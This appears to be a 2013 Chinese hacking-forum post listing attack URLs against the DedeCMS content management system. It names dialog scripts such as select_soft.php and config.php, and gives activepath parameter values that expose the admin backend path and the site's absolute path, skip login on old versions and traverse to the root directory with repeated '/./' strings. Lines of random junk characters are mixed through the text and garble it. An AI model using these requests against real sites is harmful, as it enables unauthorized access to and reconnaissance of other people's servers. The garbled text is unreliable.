1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
2 R1 v4 o* O6 P) ^9 `5 M! }+ y; ]! `
/ \; X" \1 {% h" W+ [, R9 p C! |$ `- b* C员帐号,新版本的就直接转向了后台.
- A& ?; h1 M {
' \" y% a' G+ T- Y% N* J- S! n5 v2.include/dialog/config.php会爆出后台管理路径9 x5 w' l E0 w: S v
; @. f3 Z4 E+ t: a* g
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
; q7 \1 _/ C- z" n
9 W5 c" j! V) D$ B4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径., E0 [- `7 z8 S
" C) D4 K6 g& I+ R' I& |0 r
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
; S/ S" V9 r. m" H( V
! }5 J: S/ ^6 k2 l; |* T到根目录去.不过这些版本的访问地址有些不同.
! s r& ~& Z# e. L; k+ s* }6 v5 q+ {地址为require/dialog/select_soft.php?activepath=/././././././././
2 C3 _; M# r3 H" @* U9 A8 I
: j ^/ P, |& a4 L( d L8 W+ Yinclude\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
9 B& W+ D& s( R8 v存在相同问题的文件还有
8 O7 m4 {% Z0 h/ Iinclude\dialog\select_images.php) f, }3 s) S+ r* u6 O
include\dialog\select_media.php0 D- ~" A# M. j8 q" U% p+ o7 ]' \
include\dialog\select_templets.php
* s, Z& `9 w+ f& I" ?: _/ Q; a |
发表于 2013-4-16 16:50:43
收藏
支持
反对